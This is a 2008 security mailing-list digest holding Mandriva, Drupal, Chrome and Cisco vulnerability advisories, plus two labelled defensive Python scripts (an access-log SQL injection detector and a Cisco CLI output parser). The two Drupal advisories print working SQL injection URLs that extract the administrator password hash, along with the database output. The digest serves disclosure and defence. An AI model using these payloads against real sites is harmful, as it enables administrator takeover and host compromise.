[ MDVSA-2008:204 ] blender

2008-09-24 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2008:204
 http://www.mandriva.com/security/
 ___

 Package : blender
 Date: September 24, 2008
 Affected: 2008.0, 2008.1
 ___

 Problem Description:

 Stefan Cornelius of Secunia Research reported a boundary error when
 Blender processed RGBE images which could be used to execute arbitrary
 code with the privileges of the user running Blender if a specially
 crafted .hdr or .blend file were opened (CVE-2008-1102).
 
 As well, multiple vulnerabilities involving insecure usage of temporary
 files had also been reported (CVE-2008-1103).
 
 The updated packages have been patched to prevent these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1102
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1103
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 e3a5d49f7b992b7cc4cd9525d73ea4f6  2008.0/i586/blender-2.45-2.1mdv2008.0.i586.rpm
 d5691e5af5c50fb80fc244e427918003  2008.0/SRPMS/blender-2.45-2.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 5411e43bc26366a1ec9f3a0da3670eb0  2008.0/x86_64/blender-2.45-2.1mdv2008.0.x86_64.rpm
 d5691e5af5c50fb80fc244e427918003  2008.0/SRPMS/blender-2.45-2.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 32cad77461dca17240719d8f3bb6cf6b  2008.1/i586/blender-2.45-7.1mdv2008.1.i586.rpm
 e65dbe183dbbb3420707218d69ce9897  2008.1/SRPMS/blender-2.45-7.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 a3f83bb2a3617a2d80efaccb9c207f21  2008.1/x86_64/blender-2.45-7.1mdv2008.1.x86_64.rpm
 e65dbe183dbbb3420707218d69ce9897  2008.1/SRPMS/blender-2.45-7.1mdv2008.1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



Drupal Ajax Checklist Module SQL Injection Vulnerability

2008-09-24 Thread Justin C. Klein Keane

Drupal Ajax Checklist Module SQL Injection Vulnerability

* Discovery Date: Sept 15, 2008
* Security risk: high
* Exploitable from: Remote
* Vulnerability: SQL Injection
* Discovered by: Justin C. Klein Keane <[EMAIL PROTECTED]>

Description

Drupal (http://drupal.org) is a robust content management system (CMS)
that provides extensibility through hundreds of third party modules.
While the security of Drupal core modules is vetted by a central
security team, third party modules are not reviewed for security.

The Ajax Checklist module (http://drupal.org/project/ajax_checklist),
created by AsciiKewl (http://drupal.org/user/147292) is designed to
allow users to input dynamic checklists into nodes. These checklists can
then be checked or unchecked with state tracked via AJAX calls to pages
that store the state in the database. Due to poor input validation on
the AJAX handling pages, this module is vulnerable to SQL injection
attacks. Depending on configuration, these attacks could be carried out
by remote unauthenticated users. Due to its data driven design, SQL
injection attacks pose a critical threat to Drupal installations and
their hosts and could lead to full control over the webserver process.

The critical flaw exists within the ajax_checklist_save() function
(lines 61-84 of ajax_checklist.module). This function accepts three
parameters ($nid,$qid, and $state), all of which can be manipulated via
a properly crafted URL. These parameters are then used to craft SQL
select, insert, and update statements without first being sanitized.

Vulnerable Versions

5.x-1.0 dated 1007-Aug-18 was tested and shown vulnerable

Testing for Vulnerability

Calling the URL:

http://sitename.tld/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20from%20users%20where%20uid=1),3),(4,4,%274/3/4

will cause the administrator password to be inserted into the
ajax_checkbox table in the Drupal database:

mysql> select * from ajax_checklist;
+-----+------+----------------------------------+-------+
| nid | user | qid                              | state |
+-----+------+----------------------------------+-------+
|   1 |    0 | 2                                |     2 |
|   3 |    3 | 4202b5f87a68583e20aae6917c8c33d1 |     3 |
|   4 |    4 | 4                                |     3 |
+-----+------+----------------------------------+-------+

Impact

Highly critical. Depending on configuration, this vulnerability could
allow attackers to compromise the Drupal administrator account, an
attack that can lead to web server and even host compromise since the
administrator can configure file uploads and alter any content on the
Drupal installation.

Determining Version

The ajax_checklist.info page for vulnerable versions displays the
following information:

; $Id: ajax_checklist.info,v 1.1 2007/08/16 06:39:34 asciikewl Exp $
name = Ajax Checklist
description = Creates filter-driven checklists with ajax updating to the
database
package = Other
version = 5.x-0.1

; Information added by drupal.org packaging script on 2007-08-18
version = "5.x-1.0"
project = "ajax_checklist"
datestamp = "1187416501"

Determining version information on Drupal sites is trivial in many cases
(ref http://www.madirish.net/?article=214).

Vendor Response

Drupal security team contacted September 17, 2008.  A security patch and
announcement should be available Wednesday September 24, 2008.

--

Justin C. Klein Keane
http://www.MadIrish.net


Drupal Brilliant Gallery module SQL injection vulnerability

2008-09-24 Thread Justin C. Klein Keane

* Discovery Date: Sept 17, 2008
* Security risk: high
* Exploitable from: Remote
* Vulnerability: SQL Injection
* Discovered by: Justin C. Klein Keane (a.k.a. Mad Irish)

Description

Drupal (http://drupal.org) is a robust content management system (CMS)
that provides extensibility through hundreds of third party modules.
While the security of Drupal core modules is vetted by a central
security team, third party modules are not reviewed for security.

The Brilliant module (http://drupal.org/project/brilliant_gallery),
created by Vacilanda (http://www.vacilando.org/) is designed to allow
users to easily create dynamic picture galleries by uploading images
directly to a server and including code directly within nodes to display
the gallery.

The critical flaw exists within the brilliant_gallery_checklist_save()
function (lines 109-129 of brilliant_gallery.module). This function
accepts three parameters ($nid, $qid, and $state), all of which can be
manipulated via a properly crafted URL (defined by a callback in
brilliant_gallery_menu() on line 307 of brilliant_gallery.module). These
parameters are then used to craft SQL injections via remote URL request.

5.x-4.1 dated 2008-Jul-17 was tested and shown vulnerable

Testing for Vulnerability

Calling the URL:

http://sitename.tld//bgchecklist/save/2/2/2'),(3,3,(select pass from users where uid=1),3),(4,4,4,'4

will cause the administrator password to be inserted into the
brilliant_gallery_checklist table in the Drupal database:

mysql> select * from brilliant_gallery_checklist;
+-----+------+----------------------------------+-------+
| nid | user | qid                              | state |
+-----+------+----------------------------------+-------+
|   2 |    0 | 2                                |     2 |
|   3 |    3 | 4202a5f87b68583e2eaaa6922c8c38d1 |     3 |
|   4 |    4 | 4                                |     4 |
+-----+------+----------------------------------+-------+

Impact

Highly critical. Depending on configuration, this vulnerability could
allow attackers to compromise the Drupal administrator account, an
attack that can lead to web server and even host compromise since the
administrator can configure file uploads and alter any content on the
Drupal installation.

Determining Version

The brilliant_gallery.info page for vulnerable versions displays the
following information:

; $Id: brilliant_gallery.info,v 1.7.2.1 2008/07/07 20:50:01 tjfulopp Exp $
name = Brilliant Gallery
description = Creates a fully customizable table gallery of
quality-scaled images from a pre-defined folder.
dependencies = lightbox2 colorpicker
package = Media

; Information added by drupal.org packaging script on 2008-05-05
version = "5.x-3.1"
project = "brilliant_gallery"
datestamp = "1210030204"


; Information added by drupal.org packaging script on 2008-07-17
version = "5.x-4.1"
project = "brilliant_gallery"
datestamp = "1216327204"

Determining version information on Drupal sites is trivial in many cases
(ref http://www.madirish.net/?article=214).

Vendor Response

Drupal security team contacted via e-mail September 19, 2008. Vendor
contacted September 19, 2008 via contact form submission at
http://www.vacilando.eu/contact. Vulnerability announcement should be
available at http://drupal.org/security by Wednesday, September 24,
2008. No details about patch release are available at this time.

--

Justin C. Klein Keane
http://www.MadIrish.net
http://Justin.MadIrish.net

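
As an added example (not code from either advisory, nor from the modules themselves), the following Python script scans web server access logs for requests to the two save callbacks described in the Ajax Checklist and Brilliant Gallery advisories above whose path arguments are not the three plain integers (nid, qid, state) those callbacks expect. It assumes the Apache "combined" log format; the sample lines are constructed, two of them reproducing the request URLs quoted in the advisories in percent-encoded form.

```python
import re
from urllib.parse import unquote

# Path prefixes of the two vulnerable menu callbacks described in the advisories.
# Each takes exactly three path arguments (nid, qid, state), all expected to be integers.
VULNERABLE_CALLBACKS = ("/ajaxchecklist/save/", "/bgchecklist/save/")

# Apache "combined" log line (assumed log shape; adjust for other formats).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters and keywords that never appear in legitimate (integer) arguments.
SQLI_MARKERS = re.compile(r"['()]|\b(select|union|insert|update)\b", re.I)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    # Normal module traffic: three integer arguments.
    '192.0.2.10 - - [24/Sep/2008:10:01:02 +0000] "GET /ajaxchecklist/save/1/2/1 HTTP/1.1" 200 12',
    # The request URL quoted in the Ajax Checklist advisory.
    '198.51.100.7 - - [24/Sep/2008:10:05:44 +0000] "GET /ajaxchecklist/save/1/2%27,2),(3,3,'
    '(select%20pass%20from%20users%20where%20uid=1),3),(4,4,%274/3/4 HTTP/1.1" 200 12',
    # The Brilliant Gallery request (note the doubled slash, as in the advisory), percent-encoded.
    '198.51.100.7 - - [24/Sep/2008:10:06:10 +0000] "GET //bgchecklist/save/2/2/2%27),(3,3,'
    '(select%20pass%20from%20users%20where%20uid=1),3),(4,4,4,%274 HTTP/1.1" 200 12',
    # Unrelated request.
    '192.0.2.10 - - [24/Sep/2008:10:07:00 +0000] "GET /node/5 HTTP/1.1" 200 4210',
]


def classify_request(target):
    """Return None if the request does not hit a checklist save callback; otherwise
    a dict with the callback prefix, the decoded path arguments and a 'suspicious' flag."""
    # Drop any query string, decode percent-encoding, and collapse repeated slashes
    # so the prefix still matches the '//bgchecklist/...' form.
    path = unquote(target.split("?", 1)[0])
    path = re.sub(r"/{2,}", "/", path)
    for prefix in VULNERABLE_CALLBACKS:
        if path.startswith(prefix):
            args = path[len(prefix):].split("/")
            # Legitimate calls from the module's own JavaScript carry exactly
            # three integer segments; anything else was hand-crafted.
            well_formed = len(args) == 3 and all(re.fullmatch(r"\d+", a) for a in args)
            return {
                "callback": prefix,
                "args": args,
                "suspicious": (not well_formed) or bool(SQLI_MARKERS.search(path)),
            }
    return None


def scan_log(lines):
    """Return a list of (ip, timestamp, callback, args) for suspicious save-callback hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable combined-format line
        verdict = classify_request(m.group("target"))
        if verdict and verdict["suspicious"]:
            hits.append((m.group("ip"), m.group("ts"), verdict["callback"], verdict["args"]))
    return hits


if __name__ == "__main__":
    for ip, ts, callback, args in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} crafted arguments to {callback}: {args}")
```

Because the modules' callbacks are reachable through plain GET requests, the same check can be applied retroactively to archived logs to see whether a site was probed before the module was patched or disabled.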

Re: Advisory : Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.

2008-09-24 Thread LIUDIEYU dot COM
I'm also using Google Chrome.

Another concern for me - its setup downloads:
http://cache.pack.google.com/chrome/install/149.30/chrome_installer.exe
which is not signed by authenticode.

Can anyone post hashes of this file downloaded over a trusted network?
Or, is this info available at some trusted sources?

Thanks in advance,


On 9/24/08, Aditya K Sood <[EMAIL PROTECTED]> wrote:
>
> *Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.*
>
> *Version Affected:*
> Chrome/0.2.149.30
> Chrome/0.2.149.29
>
> *Severity:*
> High
>
> *Description:*
> The Google Chrome browser is vulnerable to a memory exhaustion based
> denial of service which can be triggered remotely. The vulnerability
> triggers when a Carriage Return (\r\n\r\n) is passed as an argument to
> the window.open() function. It makes Google Chrome generate a number of
> windows at the same time, thereby leading to memory exhaustion. The
> behavior can be easily checked by looking at the task manager, as in no
> time the memory usage rises high. The problem lies in the handling of
> the object and its value returned by the javascript function. Once it
> is triggered the pop-ups start generating. The Google Chrome browser
> generates object windows continuously, thereby affecting memory of the
> resultant system. Probably it can be crashed within no time.
> User interaction is required in this.
>
> *Proof of Concept*
> http://www.secniche.org/gds
>
> *Links:*
> http://secniche.org/gcrds.html
> http://evilfingers.com/advisory/Google_Chrome_Carriage_Return_Null_Object_Memory_Exhaustion_Remote_Dos.php
>
> *Detection:*
> SecNiche confirmed this vulnerability affects Google Chrome on Microsoft
> Windows XP SP2 platform.The versions tested are:
>
> Chrome/0.2.149.30
> Chrome/0.2.149.291
>
> *Disclosure Timeline:*
> Disclosed: 22 September 2008
> Release Date: September 24, 2008
>
> *Vendor Response:*
> Google acknowledges this vulnerability and "fix" will be released soon.
>
> *Credit:*
> Aditya K Sood
>
> *Disclaimer*
> The information in the advisory is believed to be accurate at the time
> of publishing based on currently available information. Use of the
> information constitutes acceptance for use in an AS IS condition. There
> is no representation or warranties, either express or implied by or
> with respect to anything in this document, and shall not be liable for
> any implied warranties of merchantability or fitness for a particular
> purpose or for any indirect special or consequential damages.
>


Cisco Security Advisory: Cisco IOS IPS Denial of Service Vulnerability

2008-09-24 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco IOS IPS Denial of Service
Vulnerability

Advisory ID: cisco-sa-20080924-iosips

http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

The Cisco IOS Intrusion Prevention System (IPS) feature contains a
vulnerability in the processing of certain IPS signatures that use
the SERVICE.DNS engine. This vulnerability may cause a router to
crash or hang, resulting in a denial of service condition.

Cisco has released free software updates that address this
vulnerability. There is a workaround for this vulnerability.

Note: This vulnerability is not related in any way to CVE-2008-1447 -
Cache poisoning attacks. Cisco Systems has published a Cisco Security
Advisory for that vulnerability, which can be found at 
http://www.cisco.com/en/US/products/products_security_advisory09186a00809c2168.shtml

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml

Note: The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Affected Products
=

Vulnerable Products
+--

Any Cisco IOS device configured with the Cisco IOS IPS feature is
vulnerable, regardless if it is configured to use the built-in
signatures or an external signature file. Devices using either
version 4 or version 5 signatures are affected by this vulnerability.

The Cisco IOS IPS feature is not enabled by default. The command show
ip ips interfaces can be used to determine if the Cisco IOS IPS
feature has been configured and applied to any interface on the
device, as in the following example:

Router#show ip ips interfaces
Interface Configuration
  Interface FastEthernet0/0
Inbound IPS rule is ios-ips-incoming
Outgoing IPS rule is not set
  Interface FastEthernet0/1
Inbound IPS rule is not set
Outgoing IPS rule is ios-ips-outgoing
Router#

The output of the show ip ips interfaces command when the Cisco IOS
IPS feature has not been configured is dependent on which Cisco IOS
release is installed and running on the device. It may be similar to
the following example:

Router#show ip ips interfaces

Router#

or it may be similar to the following:

Router#show ip ips interfaces
Interface Configuration
  IPS is not configured on any interface
Router#
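
As an added example (not part of Cisco's advisory), the following Python parser turns the three forms of show ip ips interfaces output shown above into structured data, so the "is IPS applied anywhere?" check can be run across many devices' captured CLI output instead of by eye. The sample outputs are constructed from the advisory's examples; the indentation handling is an assumption, since the advisory notes that the output varies between IOS releases.

```python
import re

# "Interface <name>" lines and the per-direction rule lines from the advisory's
# sample output. Leading whitespace is ignored because indentation differs
# between releases (assumption).
PROMPT_RE = re.compile(r"^\S+#")                       # e.g. "Router#show ..." or "Router#"
INTERFACE_RE = re.compile(r"^\s*Interface\s+(\S+)\s*$")
RULE_RE = re.compile(r"^\s*(Inbound|Outgoing) IPS rule is\s+(.+?)\s*$")

# Constructed sample outputs, modelled on the three forms in the advisory.
CONFIGURED = """Router#show ip ips interfaces
Interface Configuration
  Interface FastEthernet0/0
    Inbound IPS rule is ios-ips-incoming
    Outgoing IPS rule is not set
  Interface FastEthernet0/1
    Inbound IPS rule is not set
    Outgoing IPS rule is ios-ips-outgoing
Router#"""

NOT_CONFIGURED_EMPTY = "Router#show ip ips interfaces\n\nRouter#"

NOT_CONFIGURED_MESSAGE = """Router#show ip ips interfaces
Interface Configuration
  IPS is not configured on any interface
Router#"""


def parse_ips_interfaces(output):
    """Parse 'show ip ips interfaces' output into {interface: {"in": rule, "out": rule}}.

    A rule value of None means 'not set'. Both 'not configured' output forms
    (empty output, or the 'IPS is not configured on any interface' message)
    yield an empty dict."""
    interfaces = {}
    current = None
    for line in output.splitlines():
        stripped = line.strip()
        if not stripped or PROMPT_RE.match(line):
            continue  # blank line or CLI prompt
        if stripped == "Interface Configuration":
            continue  # section header, not an interface name
        m = INTERFACE_RE.match(line)
        if m:
            current = m.group(1)
            interfaces[current] = {"in": None, "out": None}
            continue
        m = RULE_RE.match(line)
        if m and current is not None:
            direction = "in" if m.group(1) == "Inbound" else "out"
            rule = m.group(2)
            interfaces[current][direction] = None if rule == "not set" else rule
    return interfaces


def ips_is_applied(output):
    """True if any interface has an inbound or outgoing IPS rule, which is the
    condition the advisory gives for a device being in the vulnerable population."""
    return any(
        rules["in"] is not None or rules["out"] is not None
        for rules in parse_ips_interfaces(output).values()
    )


if __name__ == "__main__":
    for label, text in (("configured", CONFIGURED),
                        ("empty", NOT_CONFIGURED_EMPTY),
                        ("message", NOT_CONFIGURED_MESSAGE)):
        print(label, "->", "IPS applied" if ips_is_applied(text) else "IPS not applied",
              parse_ips_interfaces(text))
```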

Any version of Cisco IOS prior to the versions which are listed in
the Software Versions and Fixes section below is vulnerable.

To determine the version of the Cisco IOS software running on a Cisco
product, log in to the device and issue the show version command to
display the system banner. Cisco IOS software will identify itself as
"Internetwork Operating System Software" or simply "IOS". On the next
line of output, the image name will be displayed between parentheses,
followed by "Version" and the IOS release name. Other Cisco devices
will not have the show version command or will give different output.

The following example identifies a Cisco product running Cisco IOS
Software release 12.3(26) with an installed image name of C2500-IS-L:

Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih


Router#

The next exampl

Cisco Security Advisory: Cisco IOS MPLS VPN May Leak Information

2008-09-24 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco IOS MPLS VPN May Leak Information

Advisory ID: cisco-sa-20080924-vpn

http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

Devices running Cisco IOS versions 12.0S, 12.2, 12.3 or 12.4 and
configured for Multiprotocol Label Switching (MPLS) Virtual Private
Networks (VPNs) or VPN Routing and Forwarding Lite (VRF Lite) and
using Border Gateway Protocol (BGP) between Customer Edge (CE) and
Provider Edge (PE) devices may permit information to propagate
between VPNs.

Workarounds are available to help mitigate this vulnerability.

This issue is triggered by a logic error when processing extended
communities on the PE device.

This issue cannot be deterministically exploited by an attacker.

Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate these vulnerabilities are
available.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml

NOTE: The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Affected Products
=

Products running Cisco IOS versions 12.0S, 12.2, 12.3 or 12.4 and
configured for MPLS VPNs or VRF Lite are potentially affected.

Cisco IOS releases based on 12.1 are not affected.

Vulnerable Products
+--

Cisco IOS devices are vulnerable if they are configured for MPLS VPN
or VRF Lite and have a BGP session between the CE and PE devices, and
process extended communities. If a device is configured for MPLS VPN
or VRF Lite the command address-family ipv4 vrf  or
address-family ipv6 vrf  will be present in the device
configuration.

The following shows a command executed on a device configured for
MPLS VPN:

router#show running-config | include address-family [ipv4|ipv6]

address-family ipv4 vrf 

The following shows a PE device configured for an IPv4 BGP session
between the PE and the CE:

router bgp 
 address-family ipv4 vrf one
 neighbor  remote-as < Remote AS>
 neighbor  activate

To determine the software running on a Cisco product, log in to the
device and issue the "show version" command to display the system
banner. Cisco IOS software will identify itself as "Internetwork
Operating System Software" or simply "IOS". On the next line of
output, the image name will be displayed between parentheses,
followed by "Version" and the IOS release name. Other Cisco devices
will not have the "show version" command or will give different
output.

The following example identifies a Cisco product that is running
Cisco IOS release 12.4(11)T2:

Router#show version
Cisco IOS Software, 7200 Software (C7200-ADVSECURITYK9-M), Version 12.4(11)T2, RELEASE SOFTWARE (fc4)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2007 by Cisco Systems, Inc.
Compiled Tue 01-May-07 04:19 by prod_rel_team



Additional information on the Cisco IOS release naming conventions
can be found on the document entitled "White Paper: Cisco IOS
Reference Guide", which is available at 
http://www.cisco.com/warp/public/620/1.html

Products Confirmed Not Vulnerable
+

Cisco products not configured for MPLS VPNs or VRF Lite are
unaffected by this vulnerability.

Cisco products that do not run IOS are unaffected by this
vulnerability.

Cisco IOS-XR is not affected.

No other Cisco products are currently known to be af

Cisco Security Advisory: Cisco uBR10012 Series Devices SNMP Vulnerability

2008-09-24 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco uBR10012 Series Devices SNMP
Vulnerability

Advisory ID: cisco-sa-20080924-ubr

http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

Cisco uBR10012 series devices automatically enable Simple Network
Management Protocol (SNMP) read/write access to the device if
configured for linecard redundancy. This can be exploited by an
attacker to gain complete control of the device. Only Cisco uBR10012
series devices that are configured for linecard redundancy are
affected.

Cisco has released free software updates that address this
vulnerability. Workarounds that mitigate this vulnerability are
available.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml

NOTE: The September 24, 2008 IOS Advisory bundled publication
includes twelve Security Advisories. Eleven of the advisories address
vulnerabilities in Cisco's IOS software, and one advisory addresses
vulnerabilities in Cisco Unified Communications Manager. Each
Advisory lists the releases that correct the vulnerability described
in the Advisory. Please reference the following software table to
find a release that fixes all published IOS software Advisories as of
September 24th, 2008:

http://www.cisco.com/warp/public/707/cisco-sa-20080924-bundle.shtml

Individual publication links are listed below:

  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosips.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-vpn.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-mfi.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ipc.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-ubr.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-sccp.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-iosfw.shtml
  * http://www.cisco.com/warp/public/707/cisco-sa-20080924-l2tp.shtml

Affected Products
=

Vulnerable Products
+--

Cisco uBR10012 series devices that are running Cisco IOS and
configured for linecard redundancy are affected. Cisco uBR10012
series devices can be identified by issuing the show version command.
The following example shows output from a Cisco uBR10012 series
device running Cisco IOS software release 12.3(17b)BC7:

ubr10k#show version | include IOS
IOS (tm) 1 Software (UBR10K-K8P6U2-M), Version 12.3(17b)BC7, RELEASE SOFTWARE (fc1)
ubr10k#

Please refer to the document entitled "White Paper: Cisco IOS
Reference Guide" for additional information on the Cisco IOS release
naming conventions. This document is available at the following link:
http://www.cisco.com/warp/public/620/1.html

A Cisco uBR10012 series device configured for linecard redundancy
will have a line similar to the following in the output of show
running-config command:

member subslot / working

or

hccp  protect  

Any version of Cisco IOS prior to the versions listed in the Software
Versions and Fixes section below is vulnerable.

Products Confirmed Not Vulnerable
+

Cisco uBR10012 series devices that are not configured for linecard
redundancy are not affected.

Cisco 1 series devices are not affected even if they are
configured for linecard redundancy.

Other uBR platforms are not affected.

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

Cisco uBR10012 series devices need to communicate with an RF Switch
when configured for linecard redundancy. This communication is based
on SNMP (Simple Network Management Protocol). When linecard
redundancy is enabled on a Cisco uBR10012 series device, SNMP is also
automatically enabled with a default community string of private that
has read/write privileges. Since there are no access restrictions on
this community string, it may be exploited by an attacker to gain
complete control of the device.

Changing the default community string, adding access restrictions on
SNMP or doing both will mitigate this vulnerability. The recommended
mitigation is to do both.

This vulnerability is documented in the Cisco Bug ID CSCek57932 
and has been assigned Common Vulnerabilities and Exposures (CVE) ID
CVE-2008-3807.

Vulnerability Scoring Details
=

Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accor

Cisco Security Advisory: Cisco Unified Communications Manager Session Initiation Protocol Denial of Service Vulnerabilities

2008-09-24 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco Unified Communications Manager Session
Initiation Protocol Denial of Service Vulnerabilities

Advisory ID: cisco-sa-20080924-cucm

http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml

Revision 1.0

For Public Release 2008 September 24 1600 UTC (GMT)

- -

Summary
===

Cisco Unified Communications Manager, formerly Cisco Unified
CallManager, contains two denial of service (DoS) vulnerabilities in
the Session Initiation Protocol (SIP) service. An exploit of these
vulnerabilities may cause an interruption in voice services.

Cisco will release free software updates that address these
vulnerabilities and this advisory will be updated as fixed software
becomes available. There are no workarounds for these
vulnerabilities.

Note:  Cisco IOS software is also affected by the vulnerabilities
described in this advisory. A companion advisory for Cisco IOS
software is available at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-cucm.shtml

Affected Products
=

The vulnerabilities described in this document apply to the Cisco
Unified Communications Manager.

Vulnerable Products
+--

The following Cisco Unified Communications Manager versions are
affected:

  * Cisco Unified CallManager 4.1 versions prior to 4.1.3SR8
  * Cisco Unified CallManager 4.2 versions prior to 4.2(3)SR4b
  * Cisco Unified CallManager 4.3 versions prior to 4.3(2)SR1a
  * Cisco Unified Communications Manager 5.x versions prior to 5.1(3d)
  * Cisco Unified Communications Manager 6.x versions prior to 6.1(2)su1

Administrators of systems running Cisco Unified CallManager version
4.x can determine the software version by navigating to Help > About
Cisco Unified CallManager and selecting the Details button via the
Cisco Unified Communications Manager Administration interface.

Administrators of systems that are running Cisco Unified
Communications Manager versions 5.x and 6.x can determine the
software version by viewing the main page of the Cisco Unified
Communications Manager Administration interface. The software version
can also be determined by running the command show version active via
the command line interface.

In Cisco Unified CallManager version 4.x, the use of SIP as a call
signaling protocol is not enabled by default, and for the Cisco
Unified CallManager server to start listening for SIP messages on TCP
and UDP ports 5060 and 5061 a SIP trunk needs to be configured.

In Cisco Unified Communications Manager versions 5.x and later, the
use of SIP as a call signaling protocol is enabled by default in
Cisco Unified Communications Manager and cannot be disabled.

Cisco IOS software is also affected by these vulnerabilities,
although they are tracked by different Cisco bug IDs. A companion
security advisory for Cisco IOS software is available at 
http://www.cisco.com/warp/public/707/cisco-sa-20080924-sip.shtml

Products Confirmed Not Vulnerable
+

With the exception of Cisco IOS software, no other Cisco products are
currently known to be vulnerable to the issues described in this
advisory.

Cisco Unified Communications Manager version 7.x is not affected by
these vulnerabilities.

